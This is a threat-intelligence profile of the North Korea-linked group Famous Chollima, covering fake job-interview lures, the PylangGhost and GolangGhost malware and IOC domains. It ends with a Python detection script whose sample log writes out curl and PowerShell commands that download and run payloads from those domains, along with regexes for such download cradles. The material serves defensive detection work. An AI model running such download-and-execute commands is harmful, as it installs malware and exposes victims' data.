Famous Chollima is a North Korea-aligned threat actor, emerging in mid-2024, that is linked to both financial theft and state-directed intelligence collection. Known for targeting the cryptocurrency and blockchain sectors, the group pairs elaborate social engineering with custom malware to infiltrate organizations worldwide.
The specific leadership of Famous Chollima remains unknown, but the group appears to operate under a coordinated command structure, likely tied to North Korea's broader cyber operations apparatus.
Famous Chollima's techniques include:
Social engineering through fake job recruitment sites and counterfeit interviews.
Deployment of custom malware such as PylangGhost (Python-based, targeting Windows) and GolangGhost (Go-based, targeting macOS).
Use of fabricated identities to infiltrate companies as remote workers.
Common methods include:
Malware delivery disguised as interview steps, including bogus "driver" installations presented as prerequisites, followed by theft of data held in browser extensions.
Getting the victim to run a PowerShell or curl command that starts the malicious download.
Establishing long-term persistence for data exfiltration and espionage.
Indicators linked to Famous Chollima include:
Malicious domains such as "api.quickcamfix.online" and "api.drive-release.cloud".
File hashes related to PylangGhost/GolangGhost artifacts.
Malware deployment instructions disguised as routine job application steps.
The group primarily targets cryptocurrency and blockchain developers, engineers, and organizations. Recent campaigns have concentrated on victims in India, with both macOS and Windows users affected worldwide.
Recent activity includes the May 2025 identification of PylangGhost, a Windows variant that extended the group's earlier macOS-focused tooling. Its social engineering lures were refined alongside the malware.
No arrests related to Famous Chollima have been reported. The group's state sponsorship and operating location put it largely beyond the reach of direct law enforcement action.
Security awareness training that teaches employees to recognize recruitment-themed phishing and social engineering, in particular any "interview" that asks the candidate to paste a command into a terminal.
Monitoring DNS, proxy, and endpoint telemetry for known IOCs, such as the domains listed above and malware signatures.
Endpoint Detection and Response (EDR): use EDR tooling to flag known malware and anomalous process or network behavior, such as PowerShell or curl fetching and executing payloads from unfamiliar domains.
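The following is an added example of what the IOC monitoring and EDR points above look like as detection logic; it is not Huntress code or Famous Chollima tooling. The two IOC domains come from this profile. The log format, hostnames, file names, and command lines are constructed for the example, and the download-cradle regexes are assumptions about the shape of a "run this command to fix your camera" lure rather than published signatures. It scans DNS and process-creation records, rates a hit on a known IOC domain as high and a bare download cradle as medium for triage, and rolls the result up per host.

```python
import re
from dataclasses import dataclass

# IOC domains taken from the profile above. Everything else in this file
# (log format, hosts, file names, commands) is constructed for the example.
IOC_DOMAINS = {"api.quickcamfix.online", "api.drive-release.cloud"}

# Generic download-and-execute shapes for macOS/Linux (curl) and Windows
# (PowerShell). Assumed lure shapes, not signatures from the original page.
CRADLE_PATTERNS = {
    "curl piped to shell": re.compile(
        r"\bcurl\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b", re.I),
    "curl download then execute": re.compile(
        r"\bcurl\b[^;&|\n]*\s-[a-zA-Z]*o\s+\S+.*?(?:&&|;)\s*"
        r"(?:unzip|tar|chmod|python3?|sh|bash|open)\b", re.I),
    "powershell web download": re.compile(
        r"\bpowershell(?:\.exe)?\b.*\b(?:iwr|Invoke-WebRequest|irm|Invoke-RestMethod|"
        r"DownloadString|DownloadFile|Start-BitsTransfer|curl)\b", re.I),
    "powershell encoded command": re.compile(
        r"\bpowershell(?:\.exe)?\b.*\s-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{16,}", re.I),
}

DOMAIN_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)
SEVERITY_RANK = {"medium": 1, "high": 2}

# Constructed log: timestamp|host|event|payload. For "dns" the payload is the
# queried name; for "proc" it is the process command line.
SAMPLE_LOG = r"""
2025-05-12T09:14:02Z|dev-mac-01|dns|api.quickcamfix.online
2025-05-12T09:14:03Z|dev-mac-01|proc|/bin/sh -c "curl -k -o /var/tmp/camfix.zip https://api.quickcamfix.online/camfix && unzip -o /var/tmp/camfix.zip -d /var/tmp && python3 /var/tmp/camfix/main.py"
2025-05-12T09:20:45Z|dev-win-07|proc|powershell.exe -ExecutionPolicy Bypass -Command "iwr https://api.drive-release.cloud/camfix.zip -OutFile $env:TEMP\camfix.zip; Expand-Archive -Force $env:TEMP\camfix.zip $env:TEMP\camfix; python $env:TEMP\camfix\main.py"
2025-05-12T09:21:00Z|dev-win-07|dns|api.drive-release.cloud
2025-05-12T10:02:11Z|build-lx-02|proc|curl -fsSL https://example.com/install.sh | sh
2025-05-12T10:05:00Z|dev-win-03|dns|login.microsoftonline.com
2025-05-12T10:06:30Z|dev-win-03|proc|powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"
"""


@dataclass(frozen=True)
class Alert:
    ts: str
    host: str
    severity: str
    reason: str
    evidence: str


def ioc_domain_hits(text):
    """Return IOC domains found in text (exact match or a subdomain of one)."""
    hits = set()
    for name in DOMAIN_RE.findall(text):
        name = name.lower()
        if any(name == ioc or name.endswith("." + ioc) for ioc in IOC_DOMAINS):
            hits.add(name)
    return hits


def analyze_line(line):
    """Turn one log line into an Alert, or None if nothing is suspicious."""
    parts = line.split("|", 3)  # payload keeps any later '|' characters
    if len(parts) != 4:
        return None
    ts, host, kind, payload = parts
    reasons = []
    iocs = ioc_domain_hits(payload)
    if iocs:
        reasons.append("IOC domain: " + ", ".join(sorted(iocs)))
    if kind == "proc":
        for name, pattern in CRADLE_PATTERNS.items():
            if pattern.search(payload):
                reasons.append("download cradle: " + name)
    if not reasons:
        return None
    # A known IOC is high confidence; a bare cradle needs analyst triage.
    severity = "high" if iocs else "medium"
    return Alert(ts, host, severity, "; ".join(reasons), payload)


def scan(log_text):
    alerts = (analyze_line(l) for l in log_text.splitlines() if l.strip())
    return [a for a in alerts if a is not None]


def summarize(alerts):
    """Worst severity per host, to decide which endpoints to isolate first."""
    worst = {}
    for a in alerts:
        if SEVERITY_RANK[a.severity] > SEVERITY_RANK.get(worst.get(a.host), 0):
            worst[a.host] = a.severity
    return worst


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f"{a.ts} {a.host} [{a.severity}] {a.reason}")
    print(summarize(found))
```

The two-tier rating is the point: a DNS lookup of an IOC domain or a cradle that pulls from one is escalated immediately, while the `curl | sh` from an unrelated host lands as a medium that an analyst reviews rather than auto-blocks, since build systems produce that shape legitimately. Feeding the same logic a fresh IOC list is a one-line change to `IOC_DOMAINS`.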